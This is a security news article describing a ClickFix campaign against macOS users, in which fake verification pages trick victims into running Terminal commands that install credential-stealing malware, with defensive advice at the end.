A new macOS malware campaign is raising alarms among cybersecurity researchers, as attackers increasingly combine social engineering tactics with malicious files to bypass traditional security defenses and steal sensitive data from Apple devices.
Threat intelligence reports highlight the use of a technique known as ClickFix, where victims are tricked into executing malicious commands themselves rather than exploiting software vulnerabilities. The attack typically begins with a fake CAPTCHA or verification page that instructs users to copy and paste a command into the macOS Terminal, unknowingly initiating the infection process.
Once executed, the command downloads and installs malware such as NotNullOSX or similar infostealers via disguised files, including malicious DMG installers. These payloads are designed to appear legitimate while silently deploying background processes that evade detection and maintain persistence on the system.
Researchers note that this approach is particularly dangerous because it bypasses many traditional security mechanisms. Since the user manually runs the command, the attack avoids triggering typical exploit-based defenses and browser protections.
The malware’s capabilities are extensive. Once installed, it can harvest browser credentials, extract macOS Keychain data, access cryptocurrency wallets, and collect sensitive files such as developer secrets stored locally on the device. Stolen data is then exfiltrated to attacker-controlled servers, often without any visible signs to the victim.
Security experts warn that ClickFix campaigns, originally popular on Windows systems, are rapidly evolving to target macOS users, signaling a broader shift in attacker focus. The growing adoption of this method reflects a trend toward user-assisted attacks, where human interaction becomes the primary vulnerability rather than software flaws.
The rise of such campaigns also aligns with broader findings from threat intelligence reports, which show attackers increasingly leveraging simple but effective techniques to scale operations and bypass defenses. As these tactics become more widespread, even less sophisticated threat actors can deploy advanced malware with minimal technical effort.
Cybersecurity professionals are urging users to remain cautious, emphasizing that legitimate websites will never ask users to run Terminal commands for verification. Avoiding unknown downloads, especially DMG files from untrusted sources, and maintaining updated security protections are critical steps in defending against these evolving threats.
